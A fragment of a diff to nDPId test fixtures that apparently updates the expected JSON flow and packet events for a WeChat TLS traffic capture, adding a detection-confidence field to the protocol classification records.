+00835{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":94,"source":"wechat.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1492167353687,"flow_last_seen":1492167354049,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":59,"midstream":0,"ts_msec":1492167354049,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54089,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}}
 00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":95,"source":"wechat.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":2,"flow_last_seen":1492167354296,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1492167354296,"pkt":"eJKcD6iO8IQvSpdgCABFoAA8AABAAC4GJp3LzZeiwKgBZwG700oogx9AoQ\/Rp6ASN8hHnAAAAgQFoAQCCApF8RKkADC62gEDAwc="}
 00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":96,"source":"wechat.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":3,"flow_last_seen":1492167354296,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1492167354296,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0a31AAEAGqcfAqAFny82XotNKAbuhD9GnKIMfQYAQAOWs3QAAAQEICgAwuzRF8RKk"}
-00866{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":98,"source":"wechat.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1492167353687,"flow_last_seen":1492167354430,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1666,"flow_avg_l4_payload_len":277,"midstream":0,"ts_msec":1492167354430,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54089,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}}
-01401{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":100,"source":"wechat.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492167353687,"flow_last_seen":1492167354487,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":3094,"flow_avg_l4_payload_len":386,"midstream":0,"ts_msec":1492167354487,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54089,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","server_names":"webpush1.wechat.com,webpush.wechat.com,login.web.wechat.com,webpush.web.wechat.com,webpush2.wechat.com,webpush.web2.wechat.com,file.web2.wechat.com,web1.wechat.com,file.web.wechat.com,loginpoll.wechat.com,web2.wechat.com,login.wechat.com,login.web2.wechat.com,res.wechat.com,web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=GeoTrust Inc., CN=GeoTrust SSL CA - G3","subjectDN":"C=HK, ST=HongKong, L=Wan Chai, O=Tencent Mobility Limited, CN=web.wechat.com","alpn":"h2,http\/1.1","fingerprint":"4F:3B:6A:87:0C:D2:34:09:C9:53:9F:6F:EE:7D:7B:9B:E9:D6:EF:C1"}}
-00810{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":114,"source":"wechat.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1492167353937,"flow_last_seen":1492167355372,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":59,"midstream":0,"ts_msec":1492167355372,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54090,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}}
+00892{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":98,"source":"wechat.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1492167353687,"flow_last_seen":1492167354430,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1666,"flow_avg_l4_payload_len":277,"midstream":0,"ts_msec":1492167354430,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54089,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}}
+01427{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":100,"source":"wechat.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492167353687,"flow_last_seen":1492167354487,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":3094,"flow_avg_l4_payload_len":386,"midstream":0,"ts_msec":1492167354487,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54089,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","server_names":"webpush1.wechat.com,webpush.wechat.com,login.web.wechat.com,webpush.web.wechat.com,webpush2.wechat.com,webpush.web2.wechat.com,file.web2.wechat.com,web1.wechat.com,file.web.wechat.com,loginpoll.wechat.com,web2.wechat.com,login.wechat.com,login.web2.wechat.com,res.wechat.com,web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=GeoTrust Inc., CN=GeoTrust SSL CA - G3","subjectDN":"C=HK, ST=HongKong, L=Wan Chai, O=Tencent Mobility Limited, CN=web.wechat.com","alpn":"h2,http\/1.1","fingerprint":"4F:3B:6A:87:0C:D2:34:09:C9:53:9F:6F:EE:7D:7B:9B:E9:D6:EF:C1"}}
+00836{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":114,"source":"wechat.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1492167353937,"flow_last_seen":1492167355372,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":59,"midstream":0,"ts_msec":1492167355372,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54090,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}}
 02072{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":115,"source":"wechat.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":3,"flow_last_seen":1492167355388,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1254,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1254,"pkt_l4_len":1220,"ts_msec":1492167355388,"pkt":"8IQvSpdgeJKcD6iOCABFAATYn8NAAEAGcN3AqAFny82XotMqAbshWCCwT4FL\/oAYAchBqgAAAQEICgAwvEVF0aSGFwMDBJ8AAAAAAAAACSCXh69SRVNj7LxTHyTa29lyIMx5rUn\/Kbsx2RSLcx6h5Rof7MvhSBslxiMA7RM+grN19AFhFkb86ybE4QzYLqZogvxRJjzavJpiSw0h2JHTRLw5hxkIJT93\/hBnX4KXAJggRKu+zDGdqHHdv4fTutm2SVgm7d7YrX77rNoEa49Z7tjdE+lO2DuQkrDWrkIcPj0eYPzI9xDvhacp1zu+uHhR194mvhqvVQzKnG9JQA7M8yc34zhOP58E3OjjXwz3ELzMbE8lsUYni0FdVDzD5AHz2ZXkJTACi6epY43d8swMwJs750LtRYiDdf+30r4284+LeVd8LVUpJU\/rrav+ZKJhyQ9sw9XMWliErx\/Hsl\/5h3MZRKZeqbDE6P8CmhyiQOuweltYgaOp1rsNtfHpo493xewTpz5snn5PbRcKUqFF5M4r7lhwPPhIeVK4WOUH\/33+Sq98q7EPLrHMUFohSF90hiJaXtAj+rHVK1gMf9oOJW2ySdU7MX2DS86yuQ6kfFtJuGuxo1Cz6PJoomwid9YpsbBbTMx6m4z9l\/ny1t10Pd97BylHaTo6YBGXBgtaz8dbyFkkD5Nbk5dwtmaGlM9uIlF\/rv5c1A55dbIdj8naBbyQ7fTwTJFbjISBkJmpaQoU2kc\/zziP44xaoDUxaRt9Ry\/806C0HPovj+JC6hKAJhd7IU3lz1cd2EcOR09Ulbh6GcnGtGoIEgMSnOqlHSHFOvhwMJOgqMdjV4Ts3j6kz4nuUL7P9W38WCZ6Et6v6MCfJC1NHlb+BiknubpqgZZ7mM9\/dQzJwaHAVm1pExnTA0Qtn9u2w0Ob0wTvtwWHLqB8+w1X5lLgz+g0\/KazNnFwZsVC8NJt7gXfJimXlNiQyyoVZPRU5TsryE76p7eJsfK2K3vD+oV2xOy0odJivKdVU9d\/b0lN4vXAAJXGR8apbNgPqwivAZHIvQdWqFgNwio4MLv0L8zBSqiIiaIpEMDbJPlGf3NTa8KHL9KuF0\/XkvPuIqyQ1vikTJWv3M0PfnYGX\/91JwgIycN3X4tfAJPTYU1bJR8H9lqbTS68wW7e8n7Z9kn4BsSK8WdGfSG\/BGchlsNazeLO6dljFOzNH1Nb0yqv79UpRl3Kr1HkZo+mQcyTmdDq73MBTVTodPICJb5JR1YLjVlWLyhlubA3PMAZhd7v493hq7IuxuvrhHldQDGHsYcPZ0+ZYWLqkDletWw1l3zV0GxsjRhJ3s3iffY9XBpGE8EG39zicWNmnu8THVvBYw\/7ASp9iDFLWiJkigPswdmPFhkbbEWproj9M3h6bBS7Z9ohy6yUXPGG6RKTKX45Eg\/Pm2f3Y3bPQ15p4S5E260\/wYzmk6Pco8MZXXOtCrfsbgBU3U\/QFaYJziOi8kV14C9ocoOj7UNbOPlK4JGIThUQC22wBIoO4QcICqfGi12dFi3\/dZawWcVCDgNfdmaRqjA7vn2Ew3dMX8AfiCfUGFCye6yKRfSC\/KcvJGql1sIadq+izTaBp+jfWADKBhJTOB7x6VUd2Bs6qIc6mkvKSj4SxqM+NPNL5GVHDR9qjJ4H5zSi"}
 00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":122,"source":"wechat.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167355723,"flow_last_seen":1492167355723,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1492167355723,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54091,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":122,"source":"wechat.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":1,"flow_last_seen":1492167355723,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1492167355723,"pkt":"8IQvSpdgeJKcD6iOCABFAAA8P4ZAAEAG1bbAqAFny82XotNLAbtsCoMeAAAAAKACchAveAAAAgQFtAQCCAoAMLyYAAAAAAEDAwc="}
-00867{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":124,"source":"wechat.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1492167353937,"flow_last_seen":1492167355743,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1666,"flow_avg_l4_payload_len":277,"midstream":0,"ts_msec":1492167355743,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54090,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}}
-01401{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":126,"source":"wechat.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492167353937,"flow_last_seen":1492167355744,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":3094,"flow_avg_l4_payload_len":386,"midstream":0,"ts_msec":1492167355744,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54090,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","server_names":"webpush1.wechat.com,webpush.wechat.com,login.web.wechat.com,webpush.web.wechat.com,webpush2.wechat.com,webpush.web2.wechat.com,file.web2.wechat.com,web1.wechat.com,file.web.wechat.com,loginpoll.wechat.com,web2.wechat.com,login.wechat.com,login.web2.wechat.com,res.wechat.com,web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=GeoTrust Inc., CN=GeoTrust SSL CA - G3","subjectDN":"C=HK, ST=HongKong, L=Wan Chai, O=Tencent Mobility Limited, CN=web.wechat.com","alpn":"h2,http\/1.1","fingerprint":"4F:3B:6A:87:0C:D2:34:09:C9:53:9F:6F:EE:7D:7B:9B:E9:D6:EF:C1"}}
+00893{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":124,"source":"wechat.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1492167353937,"flow_last_seen":1492167355743,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1666,"flow_avg_l4_payload_len":277,"midstream":0,"ts_msec":1492167355743,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54090,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}}
+01427{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":126,"source":"wechat.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492167353937,"flow_last_seen":1492167355744,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":3094,"flow_avg_l4_payload_len":386,"midstream":0,"ts_msec":1492167355744,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54090,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","server_names":"webpush1.wechat.com,webpush.wechat.com,login.web.wechat.com,webpush.web.wechat.com,webpush2.wechat.com,webpush.web2.wechat.com,file.web2.wechat.com,web1.wechat.com,file.web.wechat.com,loginpoll.wechat.com,web2.wechat.com,login.wechat.com,login.web2.wechat.com,res.wechat.com,web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=GeoTrust Inc., CN=GeoTrust SSL CA - G3","subjectDN":"C=HK, ST=HongKong, L=Wan Chai, O=Tencent Mobility Limited, CN=web.wechat.com","alpn":"h2,http\/1.1","fingerprint":"4F:3B:6A:87:0C:D2:34:09:C9:53:9F:6F:EE:7D:7B:9B:E9:D6:EF:C1"}}
 00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":131,"source":"wechat.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":2,"flow_last_seen":1492167356077,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1492167356077,"pkt":"eJKcD6iO8IQvSpdgCABFoAA8AABAAC0GJ53LzZeiwKgBZwG700uz8YPYbAqDH6ASN8iq2QAAAgQFoAQCCApFrUFyADC8mAEDAwc="}
 00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":132,"source":"wechat.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":3,"flow_last_seen":1492167356077,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1492167356077,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0P4dAAEAG1b3AqAFny82XotNLAbtsCoMfs\/GD2YAQAOUQHAAAAQEICgAwvPFFrUFy"}
-00810{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":133,"source":"wechat.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1492167355723,"flow_last_seen":1492167356077,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":59,"midstream":0,"ts_msec":1492167356077,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54091,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}}
-00867{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":151,"source":"wechat.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1492167355723,"flow_last_seen":1492167356488,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1666,"flow_avg_l4_payload_len":277,"midstream":0,"ts_msec":1492167356488,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54091,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}}
-01401{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":153,"source":"wechat.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492167355723,"flow_last_seen":1492167356489,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1688,"flow_tot_l4_payload_len":3354,"flow_avg_l4_payload_len":419,"midstream":0,"ts_msec":1492167356489,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54091,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","server_names":"webpush1.wechat.com,webpush.wechat.com,login.web.wechat.com,webpush.web.wechat.com,webpush2.wechat.com,webpush.web2.wechat.com,file.web2.wechat.com,web1.wechat.com,file.web.wechat.com,loginpoll.wechat.com,web2.wechat.com,login.wechat.com,login.web2.wechat.com,res.wechat.com,web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=GeoTrust Inc., CN=GeoTrust SSL CA - G3","subjectDN":"C=HK, ST=HongKong, L=Wan Chai, O=Tencent Mobility Limited, CN=web.wechat.com","alpn":"h2,http\/1.1","fingerprint":"4F:3B:6A:87:0C:D2:34:09:C9:53:9F:6F:EE:7D:7B:9B:E9:D6:EF:C1"}}
+00836{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":133,"source":"wechat.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1492167355723,"flow_last_seen":1492167356077,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":59,"midstream":0,"ts_msec":1492167356077,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54091,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}}
+00893{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":151,"source":"wechat.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1492167355723,"flow_last_seen":1492167356488,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1666,"flow_avg_l4_payload_len":277,"midstream":0,"ts_msec":1492167356488,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54091,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}}
+01427{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":153,"source":"wechat.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492167355723,"flow_last_seen":1492167356489,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1688,"flow_tot_l4_payload_len":3354,"flow_avg_l4_payload_len":419,"midstream":0,"ts_msec":1492167356489,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54091,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","server_names":"webpush1.wechat.com,webpush.wechat.com,login.web.wechat.com,webpush.web.wechat.com,webpush2.wechat.com,webpush.web2.wechat.com,file.web2.wechat.com,web1.wechat.com,file.web.wechat.com,loginpoll.wechat.com,web2.wechat.com,login.wechat.com,login.web2.wechat.com,res.wechat.com,web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=GeoTrust Inc., CN=GeoTrust SSL CA - G3","subjectDN":"C=HK, ST=HongKong, L=Wan Chai, O=Tencent Mobility Limited, CN=web.wechat.com","alpn":"h2,http\/1.1","fingerprint":"4F:3B:6A:87:0C:D2:34:09:C9:53:9F:6F:EE:7D:7B:9B:E9:D6:EF:C1"}}
 00537{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":167,"source":"wechat.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1492167360622,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":121,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":121,"pkt_l4_len":87,"ts_msec":1492167360622,"pkt":"eJKcD6iO8IQvSpdgCABFoABrfSgAADcGnizYOs1OwKgBZwG7ugsgLP3V+HJvr4AYAV2wggAAAQEICvap78EAL9cAFwMDADI7\/WDixcApjMc4oo49oFJiwuyoshtW5rSqz9ahoHcSOkzcmjO3CkNO6pgK6XLAf2uLNg=="}
 00537{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":171,"source":"wechat.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":3,"flow_last_seen":1492167360626,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":121,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":121,"pkt_l4_len":87,"ts_msec":1492167360626,"pkt":"eJKcD6iO8IQvSpdgCABFoABr4O8AADcGG8es2RdOwKgBZwG7z+SKJZg8+z2t2oAYAVTREQAAAQEICn7IL7IAL9cCFwMDADL\/QQeiav2tbjoNjgJzOU4UPNZPR4RzRuOQ+h3eXjLhIIWjbE1Sb3YuyocNPQRCTo9EPA=="}
 00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":183,"source":"wechat.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167366908,"flow_last_seen":1492167366908,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1492167366908,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54092,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
@@ -95,11 +95,11 @@
